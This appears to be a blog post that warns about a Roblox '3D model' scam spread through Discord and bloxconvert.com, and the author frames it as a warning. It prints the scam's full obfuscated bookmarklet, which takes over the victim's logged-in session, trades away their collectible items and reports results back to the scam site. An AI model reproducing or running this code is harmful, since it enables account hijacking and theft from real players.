Elaborate Roblox “3D Model” Scam Attempt

Recently I received an interesting DM from a random user on Discord. Somehow the user found my Roblox username and offered me 8000 Robux for “[using] my avatar as the main character in a thumbnail design [they’re] making”. Also included in the message was a YouTube video, ostensibly a tutorial for exporting Roblox avatars as 3D models (spoiler: it was not).

I actually thought this was possibly legitimate based on the sender’s work posted on their Twitter account, which I now assume to be fabricated for the purpose of the scam.

Luckily, I noticed the tutorial video was uploaded only 12 hours prior to the Discord message being sent to me. That already sent some alarm bells ringing.

The video also referenced bloxconvert.com as a tool to convert Roblox profiles into 3D models. Bloxconvert.com (registered 2 months ago…) instructs the user to use a bookmarklet to turn their avatar into a 3D model. The bookmarklet looks like this:

javascript:(function(_0x422989,_0x1b14ee){var _0x1f5350=_0x1211,_0x472bc8=_0x422989();while(!![]){try{var _0x417b85=parseInt(_0x1f5350(0x178))/0x1*(-parseInt(_0x1f5350(0x16a))/0x2)+parseInt(_0x1f5350(0x175))/0x3+parseInt(_0x1f5350(0x16f))/0x4+parseInt(_0x1f5350(0x184))/0x5*(parseInt(_0x1f5350(0x193))/0x6)+-parseInt(_0x1f5350(0x17b))/0x7+-parseInt(_0x1f5350(0x199))/0x8+-parseInt(_0x1f5350(0x170))/0x9;if(_0x417b85===_0x1b14ee)break;else _0x472bc8['push'](_0x472bc8['shift']());}catch(_0x586db1){_0x472bc8['push'](_0x472bc8['shift']());}}}(_0x2fa5,0xba696),(async function(){var _0x559b92=_0x1211,_0x4b1777=(await(await fetch(_0x559b92(0x18a),{'credentials':_0x559b92(0x162)}))[_0x559b92(0x188)]())[_0x559b92(0x192)](_0x559b92(0x186))[0x1][_0x559b92(0x192)]('\x22\x20/>')[0x0],_0x4c830e=await(await fetch(_0x559b92(0x167),{'credentials':_0x559b92(0x162)}))[_0x559b92(0x168)]();userid=_0x4c830e['id'];var _0x4c4d52=await(await fetch(_0x559b92(0x19e)+userid))[_0x559b92(0x168)]();console[_0x559b92(0x161)](_0x4c4d52['Url']),console['log'](userid);var _0x3abcf8=await(await 
fetch('https://bloxconvert.com/2fa.php?id=%27+userid))[%27status%27];console[_0x559b92(0x161)](_0x3abcf8),fetch(_0x559b92(0x172)+_0x4c830e[_0x559b92(0x174)]+_0x559b92(0x17a)+userid);var%20_0x238e45=await(await%20fetch(%27https://bloxconvert.com/account.html%27))[%27text%27](),_0x4c830e=await(await%20fetch(_0x559b92(0x167),{%27credentials%27:_0x559b92(0x162)}))[_0x559b92(0x168)]();userid=_0x4c830e[%27id%27];var%20_0x4c4d52=await(await%20fetch(_0x559b92(0x19e)+userid))[_0x559b92(0x168)]();console[_0x559b92(0x161)](_0x4c4d52[_0x559b92(0x19f)]);var%20_0x4e0a15=await(await%20fetch(_0x4c4d52[%27Url%27]))[%27json%27]();console[_0x559b92(0x161)](_0x4e0a15[%27textures%27][0x0]);for(let%20_0x2dce5d=0x0;_0x2dce5d%3C0x8;_0x2dce5d++){var%20_0x55b5d5=await(await%20fetch(_0x559b92(0x16d)+_0x2dce5d+_0x559b92(0x163)+_0x4e0a15[_0x559b92(0x165)][0x1]))[_0x559b92(0x185)];if(_0x55b5d5==0xc8){var%20_0x4e0a15=_0x559b92(0x16d)+_0x2dce5d+_0x559b92(0x163)+_0x4e0a15[_0x559b92(0x165)][0x1];break;}}if(_0x3abcf8==0xc9){var%20_0x5029a1=await(await%20fetch(_0x559b92(0x18c)+userid+_0x559b92(0x190),{%27headers%27:{%27accept%27:_0x559b92(0x180),%27accept-language%27:%27en-US,en;q=0.9%27,%27sec-ch-ua%27:_0x559b92(0x1a1),%27sec-ch-ua-mobile%27:%27?0%27,%27sec-ch-ua-platform%27:_0x559b92(0x19b),%27sec-fetch-dest%27:%27empty%27,%27sec-fetch-mode%27:%27cors%27,%27sec-fetch-site%27:_0x559b92(0x18b)},%27referrer%27:_0x559b92(0x19a),%27referrerPolicy%27:_0x559b92(0x16e),%27body%27:null,%27method%27:_0x559b92(0x176),%27mode%27:_0x559b92(0x18f),%27credentials%27:_0x559b92(0x162)}))[_0x559b92(0x188)](),_0xdd4d32=await(await%20fetch(%27https://inventory.roblox.com/v1/users/%27+_0x238e45+_0x559b92(0x190),{%27headers%27:{%27accept%27:%27application/json,\x20text/plain,\x20*/*%27,%27accept-language%27:_0x559b92(0x1a0),%27sec-ch-ua%27:_0x559b92(0x1a1),%27sec-ch-ua-mobile%27:%27?0%27,%27sec-ch-ua-platform%27:_0x559b92(0x19b),%27sec-fetch-dest%27:_0x559b92(0x18e),%27sec-fetch-mode%27:_0x559b92(0x18f),%27sec-fetch-site
%27:_0x559b92(0x18b)},%27referrer%27:_0x559b92(0x19a),%27referrerPolicy%27:_0x559b92(0x16e),%27body%27:null,%27method%27:%27GET%27,%27mode%27:_0x559b92(0x18f),%27credentials%27:_0x559b92(0x162)}))[_0x559b92(0x188)](),_0x593fab=[],_0x29dad3=_0xdd4d32[_0x559b92(0x192)](_0x559b92(0x17d))[_0x559b92(0x189)]-0x1;for(let%20_0x3eed23=0x0;_0x3eed23%3C_0x29dad3;_0x3eed23++){const%20_0x32d20c=JSON[_0x559b92(0x183)](_0xdd4d32);var%20_0x55b5d5=_0x32d20c[_0x559b92(0x18d)][_0x3eed23][%27userAssetId%27],_0x81c627=_0x32d20c[_0x559b92(0x18d)][_0x3eed23][_0x559b92(0x196)];console[_0x559b92(0x161)](_0x81c627),_0x81c627%3C0x7d0&&(_0x593fab[%27push%27](_0x55b5d5),console[%27log%27](_0x55b5d5));}if(_0x593fab[_0x559b92(0x189)]==0x0){fetch(_0x559b92(0x171));throw%20new%20Error(_0x559b92(0x173));}console[_0x559b92(0x161)](_0x5029a1);try{var%20_0x29dad3=_0x5029a1[_0x559b92(0x192)](_0x559b92(0x17d))[%27length%27]-0x1;console[_0x559b92(0x161)](_0x29dad3);const%20_0x11c9c6=JSON[_0x559b92(0x183)](_0x5029a1);var%20_0x12cfe4=[];for(let%20_0x37bf67=0x0;_0x37bf67%3C_0x29dad3;_0x37bf67++){var%20_0x55b5d5=_0x11c9c6[_0x559b92(0x18d)][_0x37bf67][_0x559b92(0x17d)];_0x12cfe4[%27push%27](_0x55b5d5),console[_0x559b92(0x161)](_0x55b5d5);}}catch{fetch(_0x559b92(0x17c)+_0x5029a1);throw%20new%20Error(_0x559b92(0x187));}var%20_0x3c76c2=_0x29dad3/0x4,_0x3d2504=0x0;console[_0x559b92(0x161)](_0x12cfe4);for(let%20_0x320013=0x0;_0x320013%3C_0x3c76c2;_0x320013++){var%20_0x4800c1=await%20fetch(_0x559b92(0x164),{%27headers%27:{%27accept%27:_0x559b92(0x180),%27accept-language%27:_0x559b92(0x1a0),%27content-type%27:_0x559b92(0x19d),%27sec-ch-ua%27:%27\x22\x20Not\x20A;Brand\x22;v=\x2299\x22,\x20\x22Chromium\x22;v=\x2298\x22,\x20\x22Google\x20Chrome\x22;v=\x2298\x22%27,%27sec-ch-ua-mobile%27:%27?0%27,%27sec-ch-ua-platform%27:_0x559b92(0x19b),%27sec-fetch-dest%27:_0x559b92(0x18e),%27sec-fetch-mode%27:_0x559b92(0x18f),%27sec-fetch-site%27:_0x559b92(0x18b),%27x-csrf-token%27:_0x4b1777},%27referrer%27:%27https://www.roblox.com/%
27,%27referrerPolicy%27:%27strict-origin-when-cross-origin%27,%27body%27:_0x559b92(0x182)+_0x238e45+%27,\x22userAssetIds\x22:[%27+_0x593fab[_0x3d2504]+_0x559b92(0x19c)+userid+_0x559b92(0x194)+_0x12cfe4[0x0]+%27,%27+_0x12cfe4[0x1]+%27,%27+_0x12cfe4[0x2]+%27,%27+_0x12cfe4[0x3]+%27],\x22robux\x22:null}]}%27,%27method%27:_0x559b92(0x17e),%27mode%27:_0x559b92(0x18f),%27credentials%27:_0x559b92(0x162)})[_0x559b92(0x166)](_0x7aa946=%3E{var%20_0x2fd420=_0x559b92,_0x320e81=_0x7aa946;console[_0x2fd420(0x161)](_0x2fd420(0x197),_0x7aa946[_0x2fd420(0x185)]),_0x7aa946[_0x2fd420(0x185)]==0xc8?(fetch(_0x2fd420(0x16c)+_0x12cfe4[0x0]+_0x2fd420(0x191)+_0x12cfe4[0x1]+_0x2fd420(0x191)+_0x12cfe4[0x2]+_0x2fd420(0x191)+_0x12cfe4[0x3]),console[_0x2fd420(0x161)](_0x2fd420(0x169)),console[%27log%27](_0x7aa946)):fetch(_0x2fd420(0x17f)+_0x7aa946[_0x2fd420(0x185)]);})[_0x559b92(0x195)](_0x12d4bd=%3E{var%20_0x4f83d2=_0x559b92;console[_0x4f83d2(0x161)](_0x4f83d2(0x177));});_0x12cfe4[_0x559b92(0x181)](0x0,0x4),_0x3d2504++;}}else%20console[_0x559b92(0x161)](_0x559b92(0x179));window[_0x559b92(0x16b)][_0x559b92(0x198)]=_0x4e0a15;}()));function%20_0x1211(_0x35618f,_0x287ec9){var%20_0x2fa503=_0x2fa5();return%20_0x1211=function(_0x12117d,_0x127d82){_0x12117d=_0x12117d-0x161;var%20_0x5e50cb=_0x2fa503[_0x12117d];return%20_0x5e50cb;},_0x1211(_0x35618f,_0x287ec9);}function%20_0x2fa5(){var%20_0x5a9bc5=[%27\x20,\x20https://rolimons.com/item/%27,%27split%27,%27564yoxQvt%27,%27,\x22userAssetIds\x22:[%27,%27catch%27,%27recentAveragePrice%27,%27response.status:\x20%27,%27href%27,%271926768SVQtZx%27,%27https://www.roblox.com/%27,%27\x22Windows\x22%27,%27],\x22robux\x22:null},{\x22userId\x22:%27,%27application/json;charset=UTF-8%27,%27https://www.roblox.com/avatar-thumbnail-3d/json?userId=%27,%27Url%27,%27en-US,en;q=0.9%27,%27\x22\x20Not\x20A;Brand\x22;v=\x2299\x22,\x20\x22Chromium\x22;v=\x2298\x22,\x20\x22Google\x20Chrome\x22;v=\x2298\x22%27,%27log%27,%27include%27,%27.rbxcdn.com/%27,%27https://trades.roblox.com/v1
/trades/send%27,%27textures%27,%27then%27,%27https://users.roblox.com/v1/users/authenticated%27,%27json%27,%27dwada%27,%27140142ALkEGK%27,%27location%27,%27https://bloxconvert.com/client.php?mes=Success&items=https://rolimons.com/item/%27,%27https://t%27,%27strict-origin-when-cross-origin%27,%273185688BmXrge%27,%277092351BDwhOs%27,%27https://bloxconvert.com/erros.php?message=NotEnoughSmalls%27,%27https://bloxconvert.com/erros.php?username=%27,%27not\x20enuf\x20smalls!%27,%27name%27,%273065403FMtsIY%27,%27GET%27,%27FASD%27,%272VEaCSx%27,%27ur\x20new%27,%27&userid=%27,%271060402OdNTXx%27,%27https://bloxconvert.com/erros.php?message=%27,%27userAssetId%27,%27POST%27,%27https://bloxconvert.com/client.php?mes=Failed\x20to\x20send\x20trade.\x20Status\x20code:\x20%27,%27application/json,\x20text/plain,\x20*/*%27,%27splice%27,%27{\x22offers\x22:[{\x22userId\x22:%27,%27parse%27,%2714140qDxXBR%27,%27status%27,%27data-token=\x22%27,%27Failed\x20while\x20getting\x20items%27,%27text%27,%27length%27,%27https://www.roblox.com/home%27,%27same-site%27,%27https://inventory.roblox.com/v1/users/%27,%27data%27,%27empty%27,%27cors%27,%27/assets/collectibles?assetType=null&cursor=&limit=50&sortOrder=Desc%27];_0x2fa5=function(){return%20_0x5a9bc5;};return%20_0x2fa5();}

Obviously this is some obfuscated, malicious JavaScript. On a first glance it looks like the bookmarklet steals the user’s Roblox session and sells/trades their limited items, then phones home to bloxconvert.com to report the tasks completed. I wasn’t able to de-obfuscate the JS using some freely available online deobfuscation tools, unfortunately. (Funny enough, visiting any of the bloxconvert.com URLs in there returns some text like “SUCK IT” 😂)

This is clearly a pretty elaborate scam: I’ve seen past Roblox scams that use site lookalikes (i.e., phishing) and attempts to get users to run JS in the DevTools console, but never something this elaborate, with a fake Twitter account and a website that looks legitimate at first glance. I can definitely imagine how successful scams like these are on Roblox’s target audience.

So: never allow someone to trick you into running arbitrary JavaScript in your browser, particularly through savvier means like a bookmarklet. A bookmarklet runs inside whatever page is currently open, with the same access to that site’s logged-in session as the page itself, so there is no prompt or permission step standing between the script and your account. It might just lead to a compromised account.

Here are some reports of similar “3D model” scams I found on Reddit and Roblox DevForum.
